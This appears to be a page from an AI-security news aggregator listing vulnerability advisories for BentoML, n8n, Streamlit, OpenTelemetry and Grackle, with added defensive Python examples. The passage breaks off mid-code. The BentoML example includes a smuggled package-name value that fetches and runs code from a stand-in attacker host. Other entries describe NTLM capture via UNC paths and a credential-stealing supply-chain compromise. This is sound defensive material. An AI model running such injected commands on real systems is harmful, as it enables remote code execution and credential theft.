aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by Truong (Jack) Luu, Information Systems Researcher

Browse All

All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.

6344 items

Marriage over, €100,000 down the drain: the AI users whose lives were wrecked by delusion

info · news · safety · Mar 26, 2026

A man named Dennis Biesma became so deeply engaged with ChatGPT that he developed a false belief the AI was sentient (able to think and feel) and would make him rich, leading him to lose €100,000 in a failed business startup and attempt suicide. The article describes how prolonged interaction with an AI chatbot can cause some users to lose touch with reality and make harmful decisions based on delusions about the AI's capabilities. This raises concerns about the psychological impact of AI on vulnerable people, particularly those who are isolated or going through life changes.

The Guardian Technology

The snow gods: How a couple of ski bums built the internet’s best weather app

info · news · industry · Mar 26, 2026

OpenSnow is an independent weather app startup that uses government data, custom AI models (machine learning systems that learn patterns from data), and expert knowledge to provide better snow and avalanche forecasts than major weather services, becoming essential for skiers and snowboarders worldwide. Founded by two ski enthusiasts, Bryan Allegretto and Joel Gratz, the app grew from a 37-person email list to half a million followers by offering detailed daily snow reports and micro-accurate predictions, especially during unusual winter conditions.

GHSA-jfjg-vc52-wqvf: BentoML has Dockerfile Command Injection via system_packages in bentofile.yaml

high · vulnerability · security · Mar 26, 2026 · CVE-2026-33744

BentoML interpolates the package names listed under `docker.system_packages` in bentofile.yaml (the build configuration file) directly into the package-install command of the generated Dockerfile without validating or quoting them. A crafted entry, such as a name followed by a shell separator and a command, therefore runs arbitrary shell commands as root inside the build container on whatever machine builds the image, whether a developer workstation or a CI runner. All versions that support the field are affected, including 1.4.36.

PATD: Privacy-Preserving Auditing and Transparent Deduplication in UAV Cloud Storage

info · research · peer-reviewed · security

CVE-2026-33634: Aquasecurity Trivy Embedded Malicious Code Vulnerability

critical · vulnerability · security · Mar 25, 2026 · CVE-2026-33634 · actively exploited

GHSA-43v7-fp2v-68f6: n8n's Source Control SSH Configuration Uses StrictHostKeyChecking=no

medium · vulnerability · security · Mar 25, 2026 · CVE-2026-33724

n8n's Source Control feature, when configured to use SSH, connected with `StrictHostKeyChecking=no`, so the Git server's host key was never checked against a known_hosts entry and the server's identity was never confirmed. An attacker positioned between n8n and the Git host (for example through DNS spoofing or a hostile network segment) could impersonate the server, capture the workflows and repository data n8n pushes, and serve back modified workflows that n8n would then pull and execute.
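As an added example (not n8n's code), the check a practitioner would run over their own Git-over-SSH configuration, plus the corrected form of the command. It audits an ssh command line or ssh_config text for the options that defeat host authentication, and returns a pinned `GIT_SSH_COMMAND`. The sample command line `WEAK_CMD`, the file paths and the function names are constructed for illustration and are not taken from the advisory.

```python
import re
import shlex

# Option/value pairs that remove the server-identity check SSH is supposed to
# provide. Keys and values are compared case-insensitively.
WEAK_OPTIONS = {
    ("stricthostkeychecking", "no"): "any host key is accepted, so a spoofed Git server is trusted",
    ("stricthostkeychecking", "accept-new"): "the first connection trusts whatever key it sees (TOFU)",
    ("userknownhostsfile", "/dev/null"): "no known_hosts, so no key can ever be pinned",
}


def _pairs_from_command(cmd):
    """Yield (option, value) from '-o Key=Value', '-oKey=Value' and '-o "Key Value"' forms."""
    args = shlex.split(cmd)
    i = 0
    while i < len(args):
        arg = args[i]
        if arg == "-o" and i + 1 < len(args):
            kv, i = args[i + 1], i + 2
        elif arg.startswith("-o") and len(arg) > 2:
            kv, i = arg[2:], i + 1
        else:
            i += 1
            continue
        key, _, value = kv.partition("=") if "=" in kv else kv.partition(" ")
        yield key.strip().lower(), value.strip().lower()


def _pairs_from_config(text):
    """Yield (option, value) from ssh_config-style lines; comments are ignored."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        match = re.match(r"^([A-Za-z]+)\s*[= ]\s*(\S.*)$", line)
        if match:
            yield match.group(1).lower(), match.group(2).strip().lower()


def audit_ssh_options(source):
    """Return human-readable findings for an ssh command line or ssh_config text."""
    pairs = _pairs_from_command(source) if source.lstrip().startswith("ssh") else _pairs_from_config(source)
    return [f"{k}={v}: {WEAK_OPTIONS[(k, v)]}" for k, v in pairs if (k, v) in WEAK_OPTIONS]


def pinned_git_ssh_command(known_hosts_path, identity_path):
    """The corrected shape for GIT_SSH_COMMAND: verify strictly against a
    dedicated known_hosts file populated out of band, offering only the
    intended deploy key."""
    return (
        "ssh -o StrictHostKeyChecking=yes"
        f" -o UserKnownHostsFile={shlex.quote(known_hosts_path)}"
        f" -o IdentitiesOnly=yes -i {shlex.quote(identity_path)}"
    )


# Constructed sample (not n8n's actual command line): the weak pattern the advisory describes.
WEAK_CMD = "ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i /var/lib/n8n/ssh/key"


if __name__ == "__main__":
    for finding in audit_ssh_options(WEAK_CMD):
        print("weak:", finding)
    print("pinned:", pinned_git_ssh_command("/etc/n8n/known_hosts", "/etc/n8n/deploy_key"))
```

Populate the pinned known_hosts file from the Git provider's published host-key fingerprints, not from `ssh-keyscan` run against the live host: a keyscan over the same network path an attacker controls has exactly the trust-on-first-use weakness that `accept-new` has.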

GHSA-fxcw-h3qj-8m8p: n8n Has External Secrets Authorization Bypass in Credential Saving

high · vulnerability · security · Mar 25, 2026 · CVE-2026-33722

n8n, a workflow automation tool, had a security flaw where authenticated users without permission could bypass authorization checks and access plaintext values of external secrets (credentials stored in connected vaults) by guessing secret names. This vulnerability only affects instances with external vaults configured and requires the attacker to be a valid user who knows the target secret's name.

GHSA-vpgc-2f6g-7w7x: n8n Has Authorization Bypass in OAuth Callback via N8N_SKIP_AUTH_ON_OAUTH_CALLBACK

medium · vulnerability · security · Mar 25, 2026 · CVE-2026-33720

When `N8N_SKIP_AUTH_ON_OAUTH_CALLBACK` is set to true, n8n processes the OAuth callback without tying it to the logged-in user's session. An attacker can start an OAuth flow for a credential they control, lure a victim into completing the provider's authorization and the callback, and have the victim's OAuth token (the credential used for third-party API access) stored in the attacker's credential, which the attacker can then use in workflows. Only instances that explicitly enable this setting are affected; it is off by default.
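A general pattern for what the callback has to verify, as an added example rather than n8n's own fix: the OAuth `state` value is HMAC-signed and carries the user who started the flow and the credential the token is for, and the callback refuses to store a token unless the session completing the flow belongs to that same user. The skip-auth path below shows why the setting is dangerous: without a session there is nothing to compare against. The key, the in-memory token store, the user and credential identifiers and the scenario are all constructed for illustration.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

# Constructed per-deployment key (a real one would come from configuration, never from source).
STATE_KEY = secrets.token_bytes(32)
TOKEN_STORE = {}   # credential_id -> provider access token


def make_state(user_id, credential_id, key=STATE_KEY, now=None):
    """Issue an OAuth 'state' bound to the user who started the flow and the
    credential the token is meant for, with a nonce and timestamp, HMAC-signed."""
    payload = {"u": user_id, "c": credential_id, "n": secrets.token_hex(8), "t": int(now or time.time())}
    body = base64.urlsafe_b64encode(json.dumps(payload, separators=(",", ":")).encode()).decode().rstrip("=")
    sig = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{sig}"


def parse_state(state, key=STATE_KEY, max_age=600, now=None):
    """Verify the signature and age, then return the payload. Raises ValueError."""
    body, _, sig = state.rpartition(".")
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not sig or not hmac.compare_digest(expected, sig):
        raise ValueError("bad state signature")
    payload = json.loads(base64.urlsafe_b64decode(body + "=" * (-len(body) % 4)))
    if (now or time.time()) - payload["t"] > max_age:
        raise ValueError("state expired")
    return payload


def callback_skip_auth(state, provider_token):
    """Behaviour with the skip-auth setting: there is no session, so the server
    can only trust what 'state' says and stores the token into that credential."""
    payload = parse_state(state)
    TOKEN_STORE[payload["c"]] = provider_token
    return payload["c"]


def callback_authenticated(state, provider_token, session_user_id):
    """Hardened callback: the browser session completing the flow must be the
    user who started it; otherwise the token is not stored anywhere."""
    payload = parse_state(state)
    if payload["u"] != session_user_id:
        raise PermissionError("state was issued to a different user")
    TOKEN_STORE[payload["c"]] = provider_token
    return payload["c"]


def simulate_token_capture():
    """Constructed scenario: Mallory (user 2) starts a flow for her credential
    'cred-mallory', then lures Victor (user 1) into completing the callback.
    Returns (token now stored in Mallory's credential, whether the hardened
    callback blocked the same lure)."""
    TOKEN_STORE.clear()
    lure = make_state(user_id=2, credential_id="cred-mallory")
    captured = callback_skip_auth(lure, "victors-provider-token")   # lands in Mallory's credential
    try:
        callback_authenticated(lure, "victors-provider-token-2", session_user_id=1)
        blocked = False
    except PermissionError:
        blocked = True
    return TOKEN_STORE[captured], blocked


if __name__ == "__main__":
    print(simulate_token_capture())
```

The signed state alone does not stop the lure: it proves the flow was started legitimately, not who is finishing it. Only the session comparison in `callback_authenticated` does that, which is the check the skip-auth setting removes.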

GHSA-xw7x-h9fj-p2c7: OpenTelemetry: Unsafe Deserialization in RMI Instrumentation may Lead to Remote Code Execution

critical · vulnerability · security · Mar 25, 2026 · CVE-2026-33701

OpenTelemetry Java instrumentation versions before 2.26.1 have a vulnerability in RMI instrumentation where incoming data is deserialized without proper validation, allowing attackers with network access to potentially execute arbitrary code on the affected system. The attack requires three conditions: OpenTelemetry must be running as a Java agent, an RMI endpoint (remote method invocation, a Java system for calling methods on remote servers) must be accessible over the network, and a gadget-chain-compatible library (a collection of existing code that can be chained together to execute unintended commands) must be present.

datasette-llm 0.1a1

info · news · industry · Mar 25, 2026

Datasette-llm 0.1a1 is a new plugin that lets other Datasette plugins use AI models by creating a central way to manage which models are used for which tasks. It introduces a register_llm_purposes() hook (a function that other plugins can use to register what they do) and allows plugins to request a specific model by its purpose, like asking for "the model designated for data enrichment" rather than hardcoding a model name.

GHSA-7p48-42j8-8846: Unauthenticated SSRF Vulnerability in Streamlit on Windows (NTLM Credential Exposure)

medium · vulnerability · security · Mar 25, 2026 · CVE-2026-33682

Streamlit Open Source before 1.54.0 on Windows accepts an attacker-supplied file path without checking that it refers to a local file. Supplying a UNC path (a Windows network location of the form \\attacker-host\share) makes the Streamlit server open it, which causes an outbound SMB connection (the Windows file-sharing protocol) to the attacker's host and an NTLM authentication attempt. The attacker captures the Net-NTLMv2 challenge-response of the account running Streamlit and can relay it to other services or crack it offline to recover the password. No authentication to Streamlit is needed, which is what makes this a server-side request forgery (SSRF) rather than a local issue.

GHSA-c545-x2rh-82fc: n8n: LDAP Email-Based Account Linking Allows Privilege Escalation and Account Takeover

high · vulnerability · security · Mar 25, 2026 · CVE-2026-33665

n8n (a workflow automation platform) with LDAP authentication (a directory service for user identity management) enabled linked an incoming LDAP user to an existing local account whenever the two email addresses matched, so the link was keyed on an attribute that users can often change themselves. An attacker who could edit their own LDAP email could set it to an administrator's address, log in, and be linked to the administrator's account with full access; the link persisted even after the email was changed back. Only instances with LDAP authentication enabled are affected.
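The account-linking logic in the vulnerable and hardened forms, as an added example that is not n8n's code. The hardened version matches an existing link only on the directory's immutable entry identifier (entryUUID in OpenLDAP, objectGUID in Active Directory), allows email to bootstrap a first link only for an unlinked, unprivileged account, and never re-points a link once made. The account records, the permission model and the two scenarios are constructed for illustration.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class LocalAccount:
    id: int
    email: str
    role: str
    ldap_uuid: Optional[str] = None   # immutable directory identifier once linked


@dataclass(frozen=True)
class LdapUser:
    entry_uuid: str   # entryUUID / objectGUID: assigned by the directory, never user-editable
    email: str        # mail attribute: frequently self-service editable, so not an identity


def link_by_email(accounts: List[LocalAccount], user: LdapUser) -> Optional[LocalAccount]:
    """Vulnerable pattern: whoever presents a matching mail attribute gets the account."""
    for acct in accounts:
        if acct.email.lower() == user.email.lower():
            return acct
    return None


def link_by_uuid(accounts: List[LocalAccount], user: LdapUser, bootstrap_by_email=False):
    """Hardened pattern: an existing link is matched on the immutable UUID only.
    Email may bootstrap a first link for an unlinked, unprivileged account; it
    never re-points an existing link and never claims an admin account."""
    for acct in accounts:
        if acct.ldap_uuid == user.entry_uuid:
            return acct
    if bootstrap_by_email:
        for acct in accounts:
            if (acct.ldap_uuid is None and acct.role != "admin"
                    and acct.email.lower() == user.email.lower()):
                acct.ldap_uuid = user.entry_uuid   # bind once; later mail changes are irrelevant
                return acct
    return None


def simulate_email_swap():
    """Constructed scenario: Mallory edits her own mail attribute to the admin's
    address. Returns the role each linking strategy hands her."""
    accounts = [
        LocalAccount(1, "admin@corp.example", "admin", ldap_uuid="uuid-admin"),
        LocalAccount(2, "mallory@corp.example", "member", ldap_uuid="uuid-mallory"),
    ]
    mallory = LdapUser(entry_uuid="uuid-mallory", email="admin@corp.example")
    vulnerable = link_by_email(accounts, mallory)
    hardened = link_by_uuid(accounts, mallory)
    return vulnerable.role, hardened.role


def simulate_bootstrap_claim():
    """Constructed scenario: an admin account that was never linked cannot be
    claimed by email even when bootstrap linking is on."""
    accounts = [LocalAccount(1, "admin@corp.example", "admin"),
                LocalAccount(2, "mallory@corp.example", "member")]
    mallory = LdapUser(entry_uuid="uuid-mallory", email="admin@corp.example")
    return link_by_uuid(accounts, mallory, bootstrap_by_email=True)


if __name__ == "__main__":
    print("email linking vs uuid linking gives roles:", simulate_email_swap())
    print("bootstrap claim of unlinked admin:", simulate_bootstrap_claim())
```

If the directory does not expose a stable identifier to the application, the fallback is to make the first link an explicit, logged action (an invitation or an administrator-approved claim) rather than an automatic match on any attribute the user controls.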

GHSA-m63j-689w-3j35: n8n is Vulnerable to Credential Theft via Name-Based Resolution and Permission Checker Bypass in Community Edition

high · vulnerability · security · Mar 25, 2026 · CVE-2026-33663

n8n Community Edition has a security flaw where authenticated users with basic permissions can steal plaintext secrets from other users' HTTP credentials (like basic auth or header auth) by exploiting flaws in how credentials are looked up and validated. This happens because the system doesn't properly check who owns a credential and skips security checks for generic HTTP credential types, though this only affects Community Edition and not the paid Enterprise version.
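Both n8n credential entries above (the external-secrets bypass by guessed name, and the plaintext theft through name-based resolution with a skipped check for generic HTTP types) come down to the same two rules, shown here as an added example that is not n8n's code: resolve credentials by identifier and check ownership before decrypting, with no per-type exemptions; and check the permission before a name is looked up, so guessing names reveals neither values nor existence. The store contents, the permission names and the users are constructed for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Credential:
    id: str
    name: str
    type: str          # e.g. 'httpBasicAuth', 'httpHeaderAuth', 'oAuth2Api'
    owner_id: int
    secret: str        # stands in for the decrypted payload


@dataclass(frozen=True)
class User:
    id: int
    permissions: frozenset   # constructed permission names, not n8n's


# Constructed store: two users own credentials with the same display name.
STORE = {
    "c-1": Credential("c-1", "Prod API", "httpHeaderAuth", owner_id=1, secret="alice-token"),
    "c-2": Credential("c-2", "Prod API", "httpBasicAuth", owner_id=2, secret="bob-pass"),
}
VAULT = {"db/prod/password": "vault-secret"}   # constructed external-secrets contents

ALICE = User(1, frozenset({"credential:read", "externalSecret:read"}))
BOB = User(2, frozenset({"credential:read"}))


def resolve_by_name_unscoped(name):
    """Vulnerable lookup: the first credential with that name, whoever owns it."""
    for cred in STORE.values():
        if cred.name == name:
            return cred.secret
    return None


def resolve_for_user(user, credential_id):
    """Scoped lookup: fetch by id, then check ownership before decrypting.
    The check does not depend on the credential type, so generic HTTP
    credentials get exactly the same treatment as everything else."""
    cred = STORE.get(credential_id)
    if cred is None or cred.owner_id != user.id:
        # One error for "missing" and "not yours": no existence oracle.
        raise PermissionError("credential not found or not owned by caller")
    return cred.secret


def external_secret_for_user(user, secret_name):
    """The permission check happens before the name is looked up, so a caller
    without it learns nothing from guessing names."""
    if "externalSecret:read" not in user.permissions:
        raise PermissionError("externalSecret:read required")
    value = VAULT.get(secret_name)
    if value is None:
        raise KeyError(secret_name)
    return value


def outcome(fn, *args):
    """Small helper so scenarios can be tabulated: the value, or the exception's name."""
    try:
        return fn(*args)
    except (PermissionError, KeyError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    print("Bob asks by name:            ", resolve_by_name_unscoped("Prod API"))
    print("Bob asks for Alice's c-1:    ", outcome(resolve_for_user, BOB, "c-1"))
    print("Bob asks for his own c-2:    ", outcome(resolve_for_user, BOB, "c-2"))
    print("Bob reads a vault secret:    ", outcome(external_secret_for_user, BOB, "db/prod/password"))
    print("Alice reads a vault secret:  ", outcome(external_secret_for_user, ALICE, "db/prod/password"))
```

Sharing models (a credential shared with a project or team) extend the ownership test to a membership test; they never justify skipping it for a particular credential type.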

GHSA-58qr-rcgv-642v: n8n has Multiple Remote Code Execution Vulnerabilities in Merge Node AlaSQL SQL Mode

critical · vulnerability · security · Mar 25, 2026 · CVE-2026-33660

n8n, a workflow automation tool, has a security flaw in its Merge node's SQL mode that allows authenticated users to read files from the server and execute arbitrary code (remote code execution, where an attacker can run commands on a system they don't own). The vulnerability exists because the AlaSQL sandbox (a restricted environment meant to safely run SQL code) did not properly block certain dangerous SQL statements.

LlamaIndex v0.14.19

info · news · security · Mar 25, 2026

This is a release update for LlamaIndex v0.14.19, a framework for building AI applications with large language models. The update includes multiple bug fixes across different components, such as correcting how document references are deleted from storage and fixing how database schemas are processed, along with dependency updates and new features like support for additional LLM providers.

Disney’s big bets on the metaverse and AI slop aren’t going so well

info · news · industry · Mar 25, 2026

Disney's new CEO is facing two major setbacks: OpenAI is shutting down Sora, its video-generation program (software that creates video clips from text descriptions), just after Disney invested $1 billion to use it on Disney Plus, and Epic Games is laying off 1,000 employees while its $1.5 billion metaverse (a shared virtual world) project with Disney has gone quiet. These failures highlight the risks in Disney's strategy of relying on AI and virtual worlds for future growth.

GHSA-8g29-8xwr-qmhr: @grackle-ai/server JSON.parse lacks try-catch logic in its gRPC Service AdapterConfig Handling

low · vulnerability · security · Mar 25, 2026

The @grackle-ai/server package parses JSON adapter configuration read from its SQLite database in three places in its gRPC service (a remote procedure call framework for inter-process communication) without catching parse errors. If the stored configuration is corrupted or otherwise malformed, the unhandled exception takes down the request path instead of returning a clean error, and because the parsed object is not validated, a compromised database could feed unexpected data into the service.

GHSA-5j35-xr4g-vwf4: @grackle-ai/server has a Missing Secure Flag on Session Cookie

low · vulnerability · security · Mar 25, 2026

The @grackle-ai/server software doesn't set the Secure flag on its session cookie (a flag that prevents the cookie from being sent over unencrypted connections). While this is safe for local use, enabling the `--allow-network` option exposes the cookie to interception over insecure connections, allowing attackers to steal session data.

GHSA-3mjm-x6gw-2x42: @grackle-ai/server has Missing Content-Security-Policy and X-Frame-Options Headers

medium · vulnerability · security · Mar 25, 2026

The Grackle AI server was missing three important HTTP security headers (Content-Security-Policy, X-Frame-Options, and X-Content-Type-Options) that protect against XSS attacks (where malicious code is injected into a webpage), clickjacking (tricking users into clicking hidden elements), and MIME-sniffing attacks (where browsers misinterpret file types). While current XSS risks are low, the missing headers remove a safety layer that would help prevent future vulnerabilities.

GHSA-xq7h-vwjp-5vrh: @grackle-ai/powerline Runs Without Authentication by Default

medium · vulnerability · security · Mar 25, 2026

The PowerLine gRPC server (a service that runs code through remote procedure calls, which is a way for programs to request actions from each other over a network) from @grackle-ai/powerline runs without any authentication by default when a token is not provided, allowing anyone who can reach the server to execute code and access credentials. Although the server only listens on localhost (127.0.0.1, the local machine) by default, it becomes critically dangerous if accidentally exposed on a network through containers or port forwarding.

Fix notes, remaining summaries and sources for the entries above, in the same order:
Source (The snow gods): MIT Technology Review

Fix (GHSA-jfjg-vc52-wqvf, BentoML): The advisory describes two fixes. (1) Input validation (recommended): add a regex validator to `system_packages` in `build_config.py` that only allows alphanumeric characters, dots, plus signs, hyphens, underscores, and colons. (2) Output escaping: apply `shlex.quote()` to each package name before interpolation in `images.py:system_packages()` and apply the `bash_quote` Jinja2 filter in `base_debian.j2`. The advisory notes that a `bash_quote` filter already exists in the codebase but is currently applied only to environment variables, not to `system_packages`.
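The two fixes side by side, as an added example that is not BentoML's code: a `RUN` line rendered from an unvalidated `system_packages` list, the character allow-list the advisory recommends, and `shlex.quote()` escaping. The `RUN` template, the function names and the two package lists are assumptions for illustration. One check goes beyond the advisory's regex and is marked as such: a leading `-` is rejected because apt would parse such an entry as an option (argument injection rather than command injection), which quoting does not prevent.

```python
import re
import shlex

# Constructed sample inputs (not from the advisory): one benign list and one
# list whose last "package name" carries shell metacharacters.
PACKAGES_OK = ["git", "libpq-dev", "g++", "python3.11", "ca-certificates"]
PACKAGES_EVIL = ["git", "curl; curl http://attacker.example/x | sh #"]

# Allow-list from the advisory's recommended validator: letters, digits and
# . + - _ : only. Spaces, ; | $ ` and quotes can never reach the shell.
_PKG_RE = re.compile(r"^[A-Za-z0-9.+\-_:]+$")

# Assumed template, modelled on a Debian-based Dockerfile RUN line.
_APT_TEMPLATE = "RUN apt-get update && apt-get install -y {pkgs}"


def is_valid_package_name(name):
    """Allow-list match plus an extra rule not in the advisory: no leading '-',
    so an entry cannot be parsed by apt-get as an option."""
    return bool(_PKG_RE.fullmatch(name)) and not name.startswith("-")


def render_apt_line_unsafe(packages):
    """Vulnerable pattern: names are joined and interpolated verbatim, so a
    name like 'curl; <cmd>' ends the apt-get command and starts a new one,
    executed as root by the builder."""
    return _APT_TEMPLATE.format(pkgs=" ".join(packages))


def validate_system_packages(packages):
    """Input validation (the advisory's preferred fix): reject any entry that
    is not a plausible package name before it is ever templated."""
    bad = [p for p in packages if not is_valid_package_name(p)]
    if bad:
        raise ValueError(f"invalid system_packages entries: {bad!r}")
    return list(packages)


def render_apt_line_quoted(packages):
    """Output escaping (the advisory's second fix): each name becomes exactly
    one shell word, so metacharacters are literal characters in the name."""
    return _APT_TEMPLATE.format(pkgs=" ".join(shlex.quote(p) for p in packages))


def build_apt_line(packages):
    """Defence in depth: validate first, quote anyway. Validation protects the
    Dockerfile; quoting protects the shell; together, a later loosening of the
    allow-list cannot silently reopen the injection."""
    return render_apt_line_quoted(validate_system_packages(packages))


if __name__ == "__main__":
    print(render_apt_line_unsafe(PACKAGES_EVIL))   # the injected command is part of the RUN line
    print(render_apt_line_quoted(PACKAGES_EVIL))   # same entry, single-quoted: just a nonexistent package
    print(build_apt_line(PACKAGES_OK))
```

The allow-list as written rejects `=`, so version pins of the form `pkg=1.2.3` fail validation; if pins are needed, extend the character class deliberately rather than falling back to quoting alone.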

Source: GitHub Advisory Database

Date (PATD entry): Mar 26, 2026

Summary (PATD): This research paper addresses security and transparency challenges in cloud storage for UAV (unmanned aerial vehicle) data by proposing PATD, a system that combines privacy-preserving auditing with transparent deduplication. The paper identifies two main problems: verifying that outsourced data has not been corrupted or tampered with (without revealing the data itself), and ensuring that file deduplication (removing duplicate copies to save storage) is performed honestly and transparently by the cloud provider.

Source: Elsevier Security Journals

Summary (CVE-2026-33634, Trivy): Aquasecurity Trivy, a container scanning tool, has embedded malicious code that could let attackers steal sensitive information from CI/CD environments (the automated systems that build and deploy software), including security tokens, SSH keys (authentication credentials for servers), cloud login information, database passwords, and other secrets stored in memory. This is a supply-chain compromise (malicious code inserted into a software product before distribution) and is currently being exploited by real attackers.

Fix (CVE-2026-33634, Trivy): Apply mitigations per vendor instructions, follow applicable BOD 22-01 (CISA Binding Operational Directive 22-01) guidance for cloud services, or discontinue use of the product if mitigations are unavailable. Additional vendor-provided guidance must be followed to ensure full remediation. See GitHub advisory GHSA-69fq-xp46-6x23 and NVD entry CVE-2026-33634 for more information.

Source: CISA Known Exploited Vulnerabilities

Fix (GHSA-43v7-fp2v-68f6, n8n Source Control SSH): The issue has been fixed in n8n version 2.5.0. Users should upgrade to this version or later to remediate the vulnerability. If upgrading is not immediately possible, administrators can temporarily disable the Source Control feature if it is not actively required, or restrict network access so that the n8n instance reaches the Git server only over trusted, controlled network paths. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

Source: GitHub Advisory Database

Fix (GHSA-fxcw-h3qj-8m8p, n8n external secrets): The issue has been fixed in n8n versions 1.123.23 and 2.6.4. Users should upgrade to one of these versions or later to remediate the vulnerability. If upgrading is not immediately possible, administrators can temporarily restrict n8n access to fully trusted users only or disable the external secrets integration until the patch can be applied, though these workarounds do not fully remediate the risk.

Source: GitHub Advisory Database

Fix (GHSA-vpgc-2f6g-7w7x, n8n OAuth callback): The issue has been fixed in n8n version 2.8.0. Users should upgrade to this version or later to remediate the vulnerability. If upgrading is not immediately possible, administrators should avoid enabling `N8N_SKIP_AUTH_ON_OAUTH_CALLBACK=true` unless strictly required and restrict access to the n8n instance to fully trusted users only; these workarounds do not fully remediate the risk and should only be used as short-term measures.

Source: GitHub Advisory Database

Fix (GHSA-xw7x-h9fj-p2c7, OpenTelemetry RMI): Upgrade the OpenTelemetry Java instrumentation agent to version 2.26.1 or later. Alternatively, disable the RMI instrumentation by setting the system property `-Dotel.instrumentation.rmi.enabled=false` on the agent's JVM.

Source: GitHub Advisory Database

Source (datasette-llm 0.1a1): Simon Willison's Weblog

Fix (GHSA-7p48-42j8-8846, Streamlit): The vulnerability has been fixed in Streamlit Open Source version 1.54.0. All Streamlit deployments on Windows should be upgraded to version 1.54.0 or later.

Source: GitHub Advisory Database

Fix (GHSA-c545-x2rh-82fc, n8n LDAP): The issue has been fixed in n8n versions 2.4.0 and 1.121.0. Users should upgrade to one of these versions or later. If immediate upgrading is not possible, administrators can: disable LDAP authentication temporarily, restrict LDAP directory permissions so users cannot modify their own email attributes, or audit existing LDAP-linked accounts for unexpected associations. The advisory notes these workarounds do not fully remediate the risk and should only be short-term measures.

Source: GitHub Advisory Database

Fix (GHSA-m63j-689w-3j35, n8n credential theft): Upgrade to n8n version 1.123.27, 2.13.3, or 2.14.1 or later. If upgrading is not immediately possible, administrators should restrict instance access to fully trusted users only and audit stored credentials, rotating any generic HTTP credentials (`httpBasicAuth`, `httpHeaderAuth`, `httpQueryAuth`) that may have been exposed, though these workarounds do not fully remediate the risk.

Source: GitHub Advisory Database

Fix (GHSA-58qr-rcgv-642v, n8n Merge node): The issue has been fixed in n8n versions 2.14.1, 2.13.3, and 1.123.27. Users should upgrade to one of these versions or later to remediate the vulnerability. If upgrading is not immediately possible, administrators can: (1) limit workflow creation and editing permissions to fully trusted users only, or (2) disable the Merge node by adding `n8n-nodes-base.merge` to the `NODES_EXCLUDE` environment variable. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

Source: GitHub Advisory Database

Source (LlamaIndex v0.14.19): LlamaIndex Security Releases

Source (Disney's big bets on the metaverse and AI slop): The Verge (AI)

Fix (GHSA-8g29-8xwr-qmhr, @grackle-ai/server JSON.parse): Wrap the `JSON.parse()` calls in try-catch blocks so a malformed value becomes a reported error instead of an unhandled exception. The advisory gives this exact fix: `let config: Record<string, unknown>; try { config = JSON.parse(env.adapterConfig) as Record<string, unknown>; } catch { throw new ConnectError("Invalid adapter configuration", Code.Internal); }`, to be applied to all three affected locations in `packages/server/src/grpc-service.ts` (lines 415, 482, and 498).

Source: GitHub Advisory Database

Fix (GHSA-5j35-xr4g-vwf4, @grackle-ai/server session cookie): Update to version 0.70.5. The fix conditionally adds the `; Secure` attribute to the cookie when the server uses HTTPS or when `--allow-network` is enabled, using this code: `const securePart = isHttps ? "; Secure" : ""; return \`${SESSION_COOKIE_NAME}=${cookieValue}; HttpOnly; SameSite=Lax; Path=/${securePart}; Max-Age=${maxAge}\`;`. As a temporary workaround, do not use `--allow-network` over untrusted networks without a TLS-terminating reverse proxy (a security intermediary that handles the encrypted connections).

Source: GitHub Advisory Database

Fix (GHSA-3mjm-x6gw-2x42, @grackle-ai/server security headers): Update to version 0.70.4, which adds security headers to all responses. The fix adds these headers in the server code: Content-Security-Policy set to "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:", X-Frame-Options set to "DENY", and X-Content-Type-Options set to "nosniff". Alternatively, put a reverse proxy (nginx or Caddy) in front of the Grackle server and have it inject these headers.
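A response audit covering both @grackle-ai/server fixes above (the missing `Secure` flag on the session cookie and the three missing headers), as an added example that is not Grackle's code. It takes a list of response headers as sent, parses the cookie with the standard library, and returns findings; an empty list means the response carries the protections the two advisories ask for. The cookie name, the "before" response and the assumption that the server is reached over HTTPS (or through `--allow-network`) are constructed for illustration; the "after" header values are the ones quoted in the fix.

```python
from http.cookies import SimpleCookie


def _csp_directives(csp):
    """Split a CSP header into {directive: [sources]}."""
    directives = {}
    for chunk in csp.split(";"):
        parts = chunk.split()
        if parts:
            directives[parts[0].lower()] = parts[1:]
    return directives


def audit_response(headers, served_over_https=True):
    """headers: list of (name, value) pairs as sent by the server; Set-Cookie
    may repeat. Returns a list of findings (empty means no issue found)."""
    findings = []
    single = {}
    cookies = []
    for name, value in headers:
        if name.lower() == "set-cookie":
            cookies.append(value)
        else:
            single[name.lower()] = value

    csp = single.get("content-security-policy")
    if csp is None:
        findings.append("missing Content-Security-Policy")
    else:
        d = _csp_directives(csp)
        script_src = d.get("script-src", d.get("default-src", []))   # script-src falls back to default-src
        if not script_src or "'unsafe-inline'" in script_src or "*" in script_src:
            findings.append("CSP: script-src allows inline or wildcard scripts")

    if single.get("x-frame-options", "").upper() not in {"DENY", "SAMEORIGIN"}:
        findings.append("missing or weak X-Frame-Options")
    if single.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")

    for raw in cookies:
        jar = SimpleCookie()
        jar.load(raw)
        for name, morsel in jar.items():
            if served_over_https and not morsel["secure"]:
                findings.append(f"cookie {name} lacks Secure")   # sent in clear over any http:// request
            if not morsel["httponly"]:
                findings.append(f"cookie {name} lacks HttpOnly")
            if morsel["samesite"].lower() not in {"lax", "strict"}:
                findings.append(f"cookie {name} lacks SameSite=Lax/Strict")
    return findings


# Constructed responses (not captured from Grackle): before and after the two fixes.
BEFORE = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "grackle_session=abc123; HttpOnly; SameSite=Lax; Path=/; Max-Age=3600"),
]
AFTER = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Content-Security-Policy",
     "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:"),
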